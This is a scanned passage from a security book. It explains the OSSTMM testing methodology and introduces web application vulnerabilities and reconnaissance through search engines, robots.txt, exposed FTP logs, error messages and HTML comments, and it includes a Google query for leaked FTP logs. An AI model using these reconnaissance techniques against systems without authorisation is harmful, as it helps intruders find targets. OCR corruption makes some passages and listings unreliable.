scope as the working space for a project from the vantage point of where you will do the work. If your project is to test a company network, then the scope may be all systems from the vantage point of the internal network. Or it may be the scope of all the systems which are Web servers. However, both scopes are subsets of the security presence that make up the entire environment in which those two chosen scopes reside. Once you have defined a scope, the security tests and metrics are con- strained to that scope and the assets within that scope. Obviously, this, like statis- tics, can help you see only what you want to see. Like the old joke where a lady sees a man looking for his car keys at night under the street lamp. When she asks him what he's doing, he teUs her he's looking for the keys he lost on the way to his car. She asks if this is where he thinks he most Ukely lost them, he answers, "No, but this is where the light is." Of the three types of security quantifiable through the OSSTMM, the first type, which we define as Operational Security, is actually the lack of security you must have to be interactive, useful, public, and open. Think of any store. It has doors, sometimes windows, a lack of clocks on the walls, conveniently spaced aisles that encourage you to walk down them, and a door with a sign telling you that the store happens to be open. Why? Because it generates business having you there. The store needs to be insecure enough for you to walk in the front door so you can pick up items and put them in your basket. For that store to even exist it needs to have people come in and leave money. Before any other security requirements are considered, the store needs to be in operation. Operational Security is measured by calculating the following parameters during a security test: ■ Visibility For the scope you have defined, how many of those gate- ways to the assets (in fact, the gateways themselves may be assets), whether they are computers, people, windows, or telephones, can be www. syngress.com Professional Security Testing • Appendix A 425 determined to exist from the perspective of the test? In the example of the store, from outside the store how many employees can I determine to be inside the store with certainty? I want to know this because what- ever is inside I may try to interact with (or attack or manipulate or cir- cumvent...). Perhaps I can even determine through interaction which employee is carrying the keys to the registers. ■ Trust For the same scope, how many of the gateways to the assets allow for non-authenticated interaction either between each other or with the outside? In a small store, the employees will authenticate each other continuously just because they recognize each other according to their faces. In a large company, how do you know who is a fellow employee? By their badge? It's the same with computers. Does the Web server move data to the database server without ever having to authenti- cate itself? ■ Access For that same scope, how many actual areas are there where I can get interaction through a gateway? This is difierent from visibility where we are determining the number of gateways that are there. In vis- ibility, you only count each gateway once regardless of how many dif- ferent ways we can know it's there and regardless of whether it interacts. Where in visibility I may count that big, iron back door because it is a door that could lead into the store, I would only count it under access if I could get someone or something to interact with me when I knock on it. Additionally, I count all the different action/interaction scenarios with that door. If I knock and someone tells me to go away. That counts as one interaction. If I pick the lock and the door interacts with me by swinging open, then I count that as a second type of interaction, with the easily picked lock also classified and counted again in the second type of security. The second type is defined as Actual Security. This type is when we take into consideration that operations require a lack of security, and that anything which is open, trusted, or interactive beyond what is necessary is a problem. Consider a movie theater. While doors must be open to have customers come in, a back door with a badly designed lock where people can easily pick it to sneak in is not nec- essary for business. It's actually anti-operations since too much sneaking-in wiU inevitably lead to the end of operations. So, beyond what must be open, a security test has to tell us what is just not working in the current state of security. There following five classifications of Actual Security are called security limitations: www. syngress.com 426 Appendix A • Professional Security Testing ■ Vulnerability This is defined as a perceived flaw within a mechanism that allows for privileged access to assets. By "privileged" we mean that you can do something with them or to them. A vulnerability may be a metal in a gate which becomes brittle below 0° C, a thumb-print reader which wiU grant access without a real thumb, a mail server that lets you send SPAM to anyone you want, or even that employee who wedges the back door open aU day to conveniently slip out for smoking breaks. ■ "Weakness A weakness is any misconfiguration, survivability fault, usability fault, or failure to meet stated security requirements whether they are law or just policy. A weakness may be a process which does not save transaction data for the legal time limit as established by regional laws — for instance, a fire door alarm which does not sound if the door is left open for a given amount of time, or a firewall which allows enu- meration of internal systems using specially crafted TCP packets. ■ Exposure This is defined as a perceived flaw within a mechanism that allows for unprivileged access to sensitive information concerning data, business processes, people, or infi-astructure. It's generally used to gain privileged access or even just further knowledge on the operational security state. An exposure may be a lock with the combination available through audible signs of change within the lock's mechanisms, a router providing SNMP information about the target network, a spreadsheet of executive salaries for a private company, or a Web site with the next review date of an organization's elevators. Exposures are often called "information leaks." ■ Concern This is any security uncertainty for which a visible gateway or interactive access point provides neither privileged nor unprivileged access and has no clear business justification. This can include everything from a secretary who gives out the direct phone number of certain exec- utives who never answer their own phone anyways to the system admin- istrator who has their resume online disclosing the skills learned during their current job, but that contains no specific system, network, or per- sonnel information. Just the ability to see the papers on an employee's desk through the window wiU be a concern, even if the papers do not currently disclose information or increase access capabilities. ■ Anomaly Any unidentifiable or unknown element that is a response to the tester's stimulus but that has no known impact on security. This is www. syngress.com Professional Security Testing • Appendix A 427 data that tends to make no sense and serves no purpose as far as the tester can tell. It is reported solely for the reason that it is a response which can be triggered and may be a sign of deeper problems that may be inaccessible to the tester. An anomaly might be an unexpected response, possibly from a router in a network, that may indicate network problems. An unnatural radio frequency emanating from an area within the secure perimeter, however, offers no identification or information; the same is true for a phone which rings three times and then whistles. Additionally, it is up to the tester to be certain the anomalies come from the source in question and not from misuse of the tester's own tools. Furthermore, these classifications are divided between verified and identified security limitations. It is the responsibility of the security analyst to verify all security claims reported. However, not aU claims can be, or should be, directly verified. For example, an analyst who determines that the company has a single ISP and a single router is vulnerable to drastic Denial of Service if that router is taken oiBine. This is categorized as an identified weakness. To escalate it to a verified weakness, the tester would have to actually attack the router in a way that would prevent service for the rest of the network. The difference between verified and identified in the security test is about a level of factual certainty. However, the loss of business that this Denial of Service would cause the company is a value far greater than the liability the security tester can afford for reporting this falsely. Therefore, the security analyst can be confident in the decision that having more certainty a Denial of Service wiU be the result of this single point of failure is acceptable and preferable to the alternative. The final type of security the OSSTMM defines is loss controls. This is actu- ally defined as ten practices that prevent loss as opposed to performing security. While some of these may appear to be security to most of you, keep in mind that they don't actually prevent interaction with, or visibility of, access gateways. The purpose of loss controls is to assure that assets, such as data or even the access gateways themselves, are protected in the case of theft, failure, or any other type of loss. While you may recognize aU of these loss controls and consider some of them weak or worthless on their own, few perfectly controlled systems apply all of them. The main reason for loss controls at aU is to protect your investment in your business and the interests of those you want to do business with. Consider setting up shop to take credit cards. Neither Visa nor MasterCard are interested in how many robbers break in through your flimsy doors or poorly constructed Web site and steal your assets. They just better not be able to steal www. syngress.com 428 Appendix A • Professional Security Testing theirs. So Visa, for example, applies a security audit to assure that even if your production server walks out the door, that list of customer credit card numbers on it defies loss. It should take the attacker more resources and time to get those assets from Visa than they are worth. We've all seen the movie where the bank robbers have a really hard time breaking into the main vault only to find that their techniques burned up all the cash inside. Those are loss controls. And they're classified in the following manner: ■ Authentication What are the requirements (or barriers, to those without authentication) to enter through the gateway? If I ask you for your passport before allowing you to enter to your gate, I am authenti- cating you. ■ Non-repudiation What exists to prevent the assumed source from denying its role in any interactivity regardless of whether entry was obtained? If I can back up an e-mail sent from your computer with time -locked videotape of you sitting at that computer composing the mail, then I am producing non-repudiation of you and your actions. ■ Confidentiality Is the information or physical property displayed or exchanged between two parties known only to those two parties? If I see you exchange a closed, plain-paper package with a colleague, who views the contents of the package without reveaUng them to you, that interaction occurred with a high degree of confidentiality. ■ Privacy Is the way that information or physical property is displayed or exchanged known only between two parties? If I know that you're going to present your friend with birthday balloons and you enter into your friend's home with the balloons and I can't see or follow the inter- action process to know if your fi-iend is happy with the balloons or indifferent, then you interacted privately. ■ Indemnification Is the gateway as an asset or the information or physical property protected publicly by law or privately by insurance? If you hit my car, I may be able to legally demand money for repairs from you. If I can't find you or make you pay, then my insurance wiU cover the damage and perhaps pay for a rental car so I don't lose productivity while waiting for repairs. ■ Integrity Can the information or physical property be changed or exchanged without all parties involved with the assets being aware of www. syngress.com Professional Security Testing • Appendix A 429 the change? If you swap out my regular, brewed coffee with an instant one made of freeze-dried flakes, both of us would need to be aware of the exchange for me to say that I have strong integrity with my coffee. ■ Safety Will the security processes or mechanisms fail, but the protec- tion provided does not fail? If you cut power to a bank in order to break the electromagnetic conduction holding the lock in place on the vault, which in turn forces the lock to drop a wedge making the door impossible to open until power is returned, then we can say the lock failed safely. ■ Usability Where protection is interactive with the accessing party, do decisions of the protection process require the action of the accessing party? In order to have you to send a confidential e-mail to me, you need to use encryption. By default, the mail is not confidential and con- stantly requires you to remember to encrypt the e-mail. For this reason, we can say that your e-mail fails the usability test for security. ■ Continuity Can interaction with, or through, the gateway halt interac- tions or deny intended interaction upon failure of the gateway? As a store manager on the day before Christmas, if you fail to open up a few extra registers with experienced employees, your checkout service may be quickly overrun to the point where people wiU decide not to wait in line. You will lose business and therefore we would say that you had no business continuity. ■ Alarm If any of your operational security measures or loss controls fail or are circumvented, will you be informed? During a routine check of your web server log files, you notice a lot of traffic going to a particular internet-based client. It appears malware has somehow infiltrated this web server and has been able to open up a connection to another com- puter through your firewall. This routine log check has been a successful alarm. Connecting the Dots The OSSTMM methodology has a solid base which may seem quite involved but that's actually easy in practice. As you can see in Figure A.3, it's just like a flowchart. But it's not. The flow is more integrated and while the beginning and the end are clear, the path is defined by the tester, and the time is allotted to the test. This is because no methodology can accurately assume the business justifica- www. syngress.com 430 Appendix A • Professional Security Testing tion for channels that have been provided. More directly, the OSSTMM doesn't assume best practice. Best practice, or common criteria, or whatever it's being called these days, is only best for some. Business dictates how services should be offered and those services dictate the requirements for operational security, not the other way around. Therefore, a methodology that is different for each test and each tester is exactly what is required for thorough testing. Figure A.3 Security Testing Methodology 3.0 from the OSSTMM Logistics intrusion Detection Verification Visibiiity Audit controis verification ■* Access Verification ^ Property Vaiidation Competitive t inteiiigence Scouting Process Verification A Segregation ^ Review Containment t Measure Testing Configuration > Verification Exposure Verification Priveiages Audit t Survivability Vaiidation WWW. syngress.com Professional Security Testing • Appendix A 431 The OSSTMM begins with a posture review and ends with log verification. This is a full-circle concept where the first step is to be aware of the legalities and operational requirements of those that operate and interact with the scope, which then ends with reviewing the records our tests have left behind. In simpler terms: you know what you need to do, you do it, and then you check what you have done. The "doing" part itself, however, gets fairly involved, as can be seen in Table A.2. Table A.2 The Security Presence Channel Descriptions OSSTMM Modules Description Role of the Search Engine Posture Review Logistics Intrusion Detection Verification A thorough review of the legalities and operation requirements of operations interacting with the scope. Reviewing distance, speed, and fallibility (yours and theirs) to recognize failure possibilities in the results. Verifying the practice and breadth of intrusion detection. Visibility Audit Controls Verification Access Verification Determining the applicable gateways within the scope. Measuring the use and effectiveness of loss controls. Measuring the breadth and depth of interactive access points within the scope. Determining applicable laws and legal jurisdictions, loca- tions of primary clientele, business requirements by industry regulation, financial obligations, or ethical requirements. Researching the location, environment, and culture. Researching the organiza- tion and their known customers through success stories and marketing, or through partnerships of firms supplying monitoring or intrusion detection mech- anisms. Investigating references to the scope or parts of the security presence. Researching discovered security mechanisms for the maximum depth and cov- erage possible. Investigating references to the scope or parts of the security presence. Continued www. syngress.com 432 Appendix A • Professional Security Testing Table A.2 The Security Presence Channel Descriptions OSSTMM Modules Description Role of the Search Engine Process Verification Determining the existence Researching discovered of security processes and security mechanisms for measuring these processes related security processes, Configuration Verification for effectiveness. Determining the proper configuration of access controls and applications. Property Validation Measuring the breadth and depth of the use of illegal and unlicensed intellectual property or applications within the scope. Segregation Review A gap analysis between privacy requirements by law, by right, and by actual practice. Exposure Verification Uncovering information that provides for, or leads to, authenticated access or that allows for access to multiple locations with the same authentication. Competitive Uncovering intelligence Intelligence Scouting that could harm or adversely affect the scope through external, competitive means. Containment Determining and Measures Testing measuring the effective use of quarantine for all access to the scope. management requirements, or service-level agreements. Researching discovered security mechanisms for the depth and coverage possible through suggested configu- ration. Investigating to find the real or true information and information owners. Investigating regional privacy laws and requirements. Discovering exposed information leaked publicly. Investigating known competitors, similarities to current practices, and leads for exposed information leaked publicly. Investigating quarantine methods as well as potential hazards that can be tested in the existing quarantine. Continued www. syngress.com Professional Security Testing • Appendix A 433 Table A.2 The Security Presence Channel Descriptions OSSTMM Modules Description Role of the Search Engine Privileges Audit Survivability Validation Mapping and measuring the impact of misuse of privileges or unauthorized privilege escalation. Determining and measuring the resistance of the scope to excessive or adverse changes. Alert and Log Review A gap analysis between activities performed with the test and the true depth of those activities as recorded, or from third-party perceptions. Translating scope information into ideas for creating false identification, false authentication, and privilege escalation. Investigating known environmental instabilities and common threats of Denial of Service to and from the scope. Investigating outside perfor- mance and increasing the comparison scope of the gap analysis to other industries or countries. A proper security test may be a methodical flow, but it's far from being a sin- gular flow from start to finish. As testing continues, the tester will often have new information requiring verification in other test modules and this will continue to occur until the test expires. As stated in the OSSTMM's Rules of Thumb, the permission to perform verification tests should never be scheduled to end prior to the delivery of the report. And it is the delivery of the report, a written, verifi- able document, which marks the difierence between professional security testing and just playing around. www. syngress.com Appendix A • Professional Security Testing Summary Professional security testing requires a methodology. The methodology most often used is the Open Source Security Testing Methodology Manual from ISECOM, which appHes the volunteer efforts of thousands of people interna- tionally. This manual provides results in three aspects: as operational security, a metric which determines the amount of security required for operations; loss con- trols, a metric for determining the amount of loss prevention in security mecha- nisms; and actual security, the current state of operational security and loss control effectiveness. These three aspects are the result of practicing the methodology itself, a combination of five possible channels as gateways to intellectual or phys- ical property within the security presence, categorized as the telecommunications, wire- less communications, data networks, personnel, and physical channels. Links to Sites 0 www.isecom.org is the main site for the non-profit organization, ISECOM, maintaining the OSSTMM and many other projects. 0 www.osstmm.org is the primary Hnk to the OSSTMM itself and all translations. Mailing Lists 0 ISECOM Discussion is the primary list available for OSSTMM help, feedback, and volunteering efforts. 0 ISECOM News is a low-traffic list for providing project release and update information as well as information about ISECOM events. www. syngress.com Professional Security Testing • Appendix A Frequently Asked Questions The following Frequently Asked Questions, answered by the authors of this book, are designed to both measure your understanding of the concepts presented in this chapter and to assist you with real-life implementation of these concepts. To have your questions about this chapter answered by the author, browse to www.syngress.com/solutions and click on the "Ask the Author" form. You will also gain access to thousands of other FAQs at ITFAQnet.com. Q: Who uses the OSSTMM? Al Since the OSSTMM is freely available to aU for download, ISECOM has no way to know aU those who do apply it or require tests based on it. By the time of this printing, however, it wiU have been downloaded approximately two million times. Q: How does the OSSTMM compare with other security methodologies such as BS 7799 or OCTAVE? Al OSSTMM is a low-level, bottom-up verification of the policy information audited by higher-level methodologies like those mentioned. OSSTMM is completely compatih^^idi them and wiU enhance any risk assessment or management methoMlogycy pjfciding a basis of fact on security effective- ness. Ql Are there other penetration testing methodologies besides the OSSTMM? Al First, OSSTMM is not a penetration testing methodology. Pen testing, as it's known, is a subset of a security test that oft^ just pi^an "ethical hacker" or "pen tester" against a challenge within a pair^nkj^mie frame. Relatively little is actually achieved other than attempts to re^kthe stated goal, and it is most often a test of the tester than one of the scope. OSSTMM goes far beyond data networks alone to provide a thorough security test that includes valid metrics and a complete report of the effectiveness of all security mecha- nisms in operation. This also leads to the answer that there is nothing else out there Hke the OSSTMM. At least not yet. Ql Is it required to test aU channels to do an OSSTMM certified security test? A: No, only one channel needs to be thoroughly tested. www. syngress.com 436 Appendix A • Professional Security Testing Q: I have ideas to improve the OSSTMM. How can I help? A: The best place to share ideas is the ISECOM Discuss list. Most OSSTMM developers are on that Hst.You can also v^^rite the author directly. Q; The OSSTMM is fairly involved. Where else can I find help with it? Al Check the ISECOM Web site for seminars, help guides, core team members from your region, and the official OSSTMM certification classes. www. syngress.com Appendix B An Introduction to Web Application Security by Matt Fisher Solutions in this Chapter. ■ Defining Web Application Security jiljl The l^iqueness of Web Application Security ■ T Web Application Vulnerabilities Constraints of Search Engine Hacking rmation and Vulnerabilities in Content lyirig wi ■ Code Vulnerabilities in Web Applications ^[ieT@per jnces' B Summary El Solutions Fast^rack 12 Frequently Asked Questions 437 438 Appendix B • An Introduction to Web Application Security Introduction There is no doubt that the advent of the Internet (more specifically, the World Wide Web) has sparked a revolution in how we share information as families, businesses, and world citizens. Perhaps the most important technological inven- tion since the printing press, this one single communication medium holds tomes of information on practically any subject, although that itself is its largest weak- ness. There are now over 54 million sites on the Web', and search engines are critical to users for finding valuable information on these sites. Simple Nomad first documented search engine hacking in late 1997 and published a series of papers on how to use his favorite search engine of the time (AltaVista) . Although the search engines used have changed, using them to find vulnerabilities in Web sites is still a novel approach, for "Google crawls aU" — both the good and the bad. If you can form a query for a particular vulnerability, the chances are that Google can find it. With a little understanding of Web applica- tion security, however, you wiU realize that vulnerabilities in sites go beyond even what can be discovered with a search engine. In this appendix we discuss the basics of these vulnerabilities. Defining Web Application Security Web application security (a term often abbreviated to Web app sec) deals with the overall Web application architecture, logic, coding, and content of the Web appli- cation. In other words, Web application security isn't about operating system vul- nerabilities or the security defects in your commercial products; it's about the vulnerabilities in your own software. As such, it isn't a replacement for existing security practices but rather complements them. HopefuUy after reading this chapter you'U have a clear understanding of some Web application vulnerabilities and how the discipline of Web application security is clearly differentiated from what most people typically consider as Web site security. It can help to under- stand Web app sec by first understanding what it isn't, since the terms Web and application are used broadly in various areas of Internet security. Web application security is not about the following: ■ Trojans or viruses Although firewall manufacturers that have learned how to deal with these often describe their products as providing "appli- cation security." Although these products do indeed deal with issues at an application level, they're simply talking about the application level of www. syngress.com An Introduction to Web Application Security • Appendix B 439 the OSI stack, not your Web application. The difference is quite distinct in reality, although it has been heavily blurred in the marketing. There are very few actual Web application firewalls on the market, and they are aU quite specialized devices; if the same firewall vendor you've been using for years claims to have an application firewall, dig into the details and ensure that the vendor is actually talking about Web application security and not malware and other application-level attacks. ■ Dealing with Spam That's a whole different can of worms (the worms, of course, being the spammers) . It's true that spam occurs at the application layer, but again we're talking about something completely different. The focus of Web application security is not protecting your end users from something traveling over the network; it's about pro- tecting your Web site from being hacked. ■ Web filtering This area is really more concerned with watching out- bound Web traffic to make sure an employee isn't surfing using his fan- tasy football league at work. ■ Known vulnerabilities in the operating system or Web server Although these vulnerabilities certainly are extremely important and must be addressed, it's a fairly mature space that is well understood. In fact, it is so well understood that one could argue that it put "blinders" on the industry, allowing Web appUcation vulnerabiUties to grow and grow with little mitigation until only recently. The Uniqueness of Web Application Security The differences between Web application vulnerabilities and known/ server vul- nerabilities deserve further discussion. When people talk about vulnerabilities (and vulnerability assessments in particular), the majority of the industry deals with "known vulnerabilities" that homogenously affect every install of the partic- ular version of the affected software. This allows for several luxuries in dealing with these types of vulnerabilities: ■ When a vulnerability is announced, everyone becomes aware of the vul- nerability at the same time. Not aU vulnerabilities that are discovered are announced, however. www. syngress.com 440 Appendix B • An Introduction to Web Application Security ■ Everyone is aiiected by the vulerability in the same manner, allowing for a single solution to be applied — usually a software patch from the soft- ware manufacturer. ■ Since the vulnerability is identical across the board, a single "signature" of it can be created and applied to any number of scanners, firewalls, or intrusion detection devices. In contrast to these network or OS vulnerabilities, most Web application vul- nerabilities aren't "known" vulnerabilities. Since they exist in the Web applica- tion, which is almost always custom written, they are unique to that application. Of course, the technique or methodology might be weU known (as SQL injec- tion is well known), but not every Web application wiU be vulnerable to a cer- tain technique, and even the ones that are wiU be vulnerable in unique areas in different ways. This has a real impact on how you deal with Web app vulnerabilities; since they're your own custom-built vulnerabilities, you have to deal with them your- self. This means: ■ You won't receive a vulnerability announcement about them. ■ You won't find them indexed in tomes such as Mitre's CVE database or the SANS Top 20 list. ■ These vulnerabilities can exist on any platform (combination of OS and Web server) and can exist regardless of the security of the platform itself. ■ You won't be able to rely on a vendor patch. Again, this is your soft- ware, not COTS, so there is absolutely no leveraging the homogenous environment. The exception to these rules are "off-the-shelf" Web applications such as PHPNuke, DotNetNuke, or any number of COTS Web software. When you're using a "canned" Web appUcation, the ben- efit of a homogenous environment does exist. Of course, the second these applications are modified in the least, they become custom soft- ware; and they're almost always modified to some extent. Web Application Vulnerabilities Remedying Web application vulnerabilities is not particularly difficult. The chal- lenge instead is that of awareness and testing. The channels that developers are www. syngress.com An Introduction to Web Application Security • Appendix B 441 taught and trained conspicuously lack security awareness, and developers are often taught standard techniques that yield insecure code. It is important to point out as well that the majority of Web applications have not been adequately tested for security, if tested at all. The majority of testing on applications is geared toward functionality and performance, which also means that most developers tend to code to those two standards. Only in the last few years have comprehen- sive scanning solutions been available for testing Web application security. Aside from those few scanners, most of the tools available are either for manual testing or automated for only a tiny portion of what must be tested. This means that most security testing has relied on either penetration testing or code reviews — both of which require significant expertise and are rarely conducted as frequently as necessary to ensure the ongoing security of the application. Regardless of the reasons, Web application vulnerabilities abound, and this risk is just now being realized. Compared to many forms of hacking, Web appli- cation hacking is an extraordinarily easy discipline. Many people who have no clue how to exploit the numerous buffer overflows that are being constantly dis- covered can skillfully identify and exploit Web app vulnerabilities. Obviously, as this security space matures, the hacking will become less fruitful, but the fact of the matter is that Web hackers have a number of advantages: ■ Web app vulnerabilities get their own rule on the firewall: "Allow HTTP and from any source." In fact, in most firewalls, it's probably the very first rule.- ■ This is a difficult area to effectively and properly monitor with an intru- sion detection system. As such, it is rarely monitored properly, if at all. ■ Few tools are required. Many vulnerabilities can be discovered and exploited right from a browser. Those that can't simply require a min- imal tool set — typically just a proxy that exposes the raw HTTP packet. ■ Web application vulnerabilities are so easy to discover that people can actually find "opportunity hacks" with a search engine, although we'll discuss the limitations of this approach as it pertains to actual Web appli- cation assessments. As a result, Web applications can be exploited left and right. When you really think about it, this shouldn't come as a surprise. After all, if multibiUion-doUar software companies have trouble securing their software, why wouldn't smaller, lesser trained shops with significantly less access to resources have the same prob- www. syngress.com 442 Appendix B • An Introduction to Web Application Security lemsPThe answer, of course, is that their software — the Web applications — are just as insecure; these companies just don't realize it. Web application vulnerabilities exist in many areas, and understanding those areas is critical to understanding Web app sec. The Top 10 Web Application Vulnerabilities list by the Open Web Application Security Project (www.owasp.org) is perhaps the oldest and most estabUshed Ust of Web appUca- tion vulnerabiUties. It's often cited in papers and Web sites and is a great place to start learning the various types of Web application threats. However, it's not an attempt to enumerate and classify all possible vulnerabilities; it's a running list of what the project members perceive to be the most important Web application threats at the time of writing, much as is the SANS Top 20 list. There are documents that attempt to classify the full realm of Web applica- tion threats. The OASIS WAS Vulnerability Types and Vulnerability Ranking Model does an excellent job of organizing vulnerability types into a model that is particularly useful for referencing very specific issues. Likewise, the Web Application Security Consortium (http://www.webappsec.org) published its Threat Classification paper as an organizational model as well. Read both papers, as well as other sources, to learn the sum total of Web application threats out there. (Some resources are listed at the end of this chapter.) Here is a sample of some general types of Web application vulnerabilities: ■ Authentication issues These refer to things such as login mechanisms, preventing password theft through mechanisms such as "Lost Password" features, and ensuring that all "secure" content actually requires authen- tication. This area has received a lot of attention over the years, and some fairly standard practices have evolved, though they are often debated. ■ Session management This is a very important area, dealing with problems such as preventing session spoofing by predicting credentials (i.e., sessions IDs) and ensuring that application features that require higher access properly check the authorization level of the user. Several recent publicized hacks were the result of weak session management. ■ Command injection These are the result of the application accepting input from the browser (whether it's input that the user typed in or input that the programmer passed from a previous page) that allows the attacker to insert commands and execute them. These commands can range from database queries (such as in the case of SQL injection) to www. syngress.com An Introduction to Web Application Security • Appendix B 443 JavaScript (as in cross-site scripting) or even actual system commands. The impact of these is often devastating. Note that command execution is not Umited to system commands; even just the ability to insert HTML into a page could be used to hack successfully. ■ Information disclosure There are lots of clues in Web sites that help a hacker, from HTML comments to finding complete software manuals on the system (yes, this happens all the time) . Although any single inci- dent of information disclosure by itself is rarely useful for a complete hack; these incidents often have a damaging cumulative eiiect. Note that this is by no means a complete list of all possible Web application vulnerabilities; it is merely a start. Web applications have the potential to be infinitely complex, and thus do their vulnerabilities; be sure to read the papers mentioned in this chapter to learn more about the fuU scope of vulnerabilities and threats. For the purposes of this appendix, we'U abstract the issues even higher, relating them to the content and code of the site. What we're labeUng as "con- tent issues" are those vulnerabilities that appear in the actual page itself; they are "standalone" vulnerabilities that don't require any real understanding of how the application works. In contrast, "code" issues exist in the server-side code for the page and require actually exercising the logic for that page to see what you can get away with in it. You can use search engines to find symptoms of code -related errors: for instance, certain ODBC errors can be indicative of SQL injection, but to truly determine if the vulnerability does indeed exist (and the extent of it), you have to make follow-on requests with specially formed packets to test it. Even with strictly content issues, a search engine wiU not expose the fuU gamut of issues. Search engines crawl and index by very specific rules to ensure that they "play nicely" with Web sites, and this limits the amount of content you can find through them. Constraints of Search-Engine Hacking This book has already given a very good picture of exactly what can be found just in the content. But it's important to also understand the constraints of search engine hacking. Certainly using a search engine will find targets of opportunity, but when you're talking about actually doing a concerted test on a target system, you need to understand that anything you turn up using a search engine is just www. syngress.com 444 Appendix B • An Introduction to Web Application Security the tip of the iceberg. To put this in graphical terms, Figure B.l displays the subset of vulnerabilities that are exposed to Google. Figure B.l Only a Subset of Vulnerabilities Is Exposed to Google First, not all sites are crawled by Google. That's hard to believe, but remember that for every public Web application any sizable company has (and has sub- mitted to Google to crawl), many others are either not on the Web at aU or are not public Web sites. These could include the strictly internal Web applications within a company or extranets that are external facing but meant for an extremely limited audience. Even of the sites Google does crawl, not aU of each site will be crawled. Google can only follow Unked pages, and it doesn't do any guessing at filenames or follow clues to other files. Not even all linked files are followed; certainly those linked with HTML links are, but JavaScript links might not necessarily be followed, and pages that can only be found via a form submission won't be found at all. Additionally, Google poUtely respects requests not to crawl certain areas, as indicated in the robots.txt file. All this means that although lots of serious information can be garnered using search engines, this form of hacking is by no means the complete picture of Web application security. In fact, even just in the realm of content there's a lot Code Issues Unlinked Content An Introduction to Web Application Security • Appendix B 445 of information (and vulnerabilities) that a human can find but a search engine would probably miss. Information and Vulnerabilities in Content The first thing to realize about content is that it takes many forms. A typical Web page will obviously contain HTML that is rendered in the browser, but addi- tional information in the page source can be valuable to a hacker or penetration tester. JavaScript, comments, and hidden form fields all yield clues and can even be manipulated to actively test the application. Page-scraping techniques, such as those covered throughout this book, can be used to extend the results of a search to get to this type of data. However, beyond the page source, a great deal of information is available in the raw HTTP itself — status codes, headers, and post data are all valuable areas that are not exposed in the browser. Typically, a crawl is the starting point to dis- cover as much of the site as possible. Additional work will almost always yield more content to scrutinize; this could be a dictionary attack that simply requests a list of fdes, or it could involve manually poking around and requesting files. More often than not, it's a combination of the two. Although actual vulnerabili- ties can be discovered in content, for the most part the biggest value comes in information disclosures. The Fast Road to Directory Enumerations Some files save a hacker a lot of reconnaissance work by giving him or her a complete list of additional content to analyze. Some of the most obvious files that yield lots of good directory and/or filenames are the robots.txt file, FTP logs, and Web traffic reports, although obviously others can exist as well. These techniques are all covered in detail throughout this book, but we present them in brief here, firmly placed within the context of a Web application assessment. Robots.txt Robots.txt is a plaintext file. Of course, even more can be unearthed by exam- ining the raw packets that tell search engines where they can and can't crawl. This file is always plaintext and is always stored in the root of the Web site — that is, at www.tfefo;Ye.com/roots.txt. For this reason, it's a great way to start off your searching. www. syngress.com 446 Appendix B • An Introduction to Web Application Security Robots.txt is a simple file: It specifies a user agent and directories that are either explicitly allowed or disallowed. It is very useful for quickly identifying interesting areas of the application because if a search engine is explicitly told not to search a certain directory, a hacker would certainly want to know why. Take, for example. Figure B.2, in which we see the robots.txt file from Google.com. There are several interesting directory names that search engines have been told not to crawl, one of which is the /catalogs directory. By manually browsing google.com/catalogs, you'll see that this is a beta application that might not have been otherwise detected. Figure B.2 Google.com/robots.txt lOl hMp://¥n*w:google.cDniyrabols_l:Kt User-agen Disallow: /seatich 1 Disallow: /groups 1 Disallow: /images f Disallow: /catalogs Disallow: /catalog list Disallow: /iieus Disallow: /page ad/ Disallow: /celpage/ Disallow: / itiigres Disallow: /keyword/ Disallow: /u/ Disallow: / un Lv/ Disallow: / cobcand Disallow: / custom Disallow: /advanced gcoup seaucli Disallow: / advanced search Disallow: /googlesite Disallow: / preferences Disallow: /setpref 3 Disallow: Disallow: /url 1 Disallow: /wiiil 1 Disallow: /bsd? 1 Disallow: Disallow: Disallow: /itiac? 1 Disallow: Disallow: /unclesaiti? Disallow: / answers/ sear ch?q= Disallow: / local Disallow: /f roogle? Disallow: /froogle Of course, the robots.txt fde has to be manually created, meaning that the system designers should be well aware of the fact that they're advertising those directory names. However, the search results are far more interesting to the hacker when the designers and administrators are not aware of certain directories he or she has located. FTP Log Files Log files are also an incredible source of additional directories and filenames to check, as we've seen throughout this book, especially in Chapter 10. Frequently these are FTP log files, although any type of logging or trace file that's viewable www. syngress.com An Introduction to Web Application Security • Appendix B 447 to the public is a liability. FTP logs in particular give the hacker that many more files to look for and can also reveal such things as the system name, client IP address, or even the internal IP address of the system. Think about who FTPs to a Web server — most likely someone with privileges, and if that IP traces back to a residential line, an alternative target comes to light: a system that will probably be considerably less defended but has plenty of access to the Web site. Never allow log files of any type to gather on a server in the Webroot, because they won't attract dust. Figure B.3 shows a quick Google search for a very common FTP log filename. Some of these files were intentionally placed by the administrators, but surely most were not. Figure B.3 Google Search Results for a Common FTP Log File Results 1 - 10 of about 255,000 for allinurl:"Sws_ftp.log". (0.73 seconds) Web Traffic Reports Web traffic reports, explored in Chapter 1 0, are also a highly valuable source of information to the hacker. These are reports generated by specialized software that analyzes the Web traffic logs to generate easily digestible information about the Web traffic. In particular, most reports show not only the most popular pages but the least popular as well. This almost always presents some interesting areas to be explored. Think contrarian here; if you have a public Web site that takes hun- dreds of thousands of hits a day, but some pages only take several hundred hits a day, what function do you think those pages play within the Web application? They could be a remote Web-based admin section or perhaps a separate section for customer service representatives to log into and access higher functionaUty. Either way, chances are they'll be a good source of information, and in some cases, extreme vulnerabilities can be found in these stats. HTML Comments HTML comments are also a great source of information, not just for finding more content but about the system itself and more. Many developers are still leaving "TMI" — too much information — in their client-side comments. For example, some commonly seen ones include: ■ Directory names or filenames ■ References to server-side code www. syngress.com 448 Appendix B • An Introduction to Web Application Security ■ Documenting template pages ■ References to installed applications or systems ■ Revision history ■ Internal names or contact information (many companies use the same naming conventions for their logins as they do their e-mail) ■ Revision history Error Messages Error messages are another phenomenal source of information, as we've seen throughout this book, highlighted in Chapters 8 and 10. They're all over the Web and often overlooked by untrained eyes. Every error message tells a story, and they're flashing neon signs that say "my site is broken." Hackers will almost always stop to see exactly how broken. These messages can also reveal large amounts of sensitive information such as file system paths, additional content, internal code, and more. Most extremely useful error messages are generated with active testing (tampering with the application), but many can be found with a crawl as well. In Figure B.4, an error message reveals the file system path, along with information about the server-side code. Figure B.4 Error Message Revealing the Web Root and Other Details ftocikie.contactid# I Error near lire 27, column 21 . I Error resolvina parameterCOOKIE.CONTACTID I The cookie value CONTACTID was riot found in the current template file. The cause of this error is veiy likely one of the following things: r 1. The name ofthe cookie variable has been misspelled. | 2. The cookie variable has notyet been created or has timed 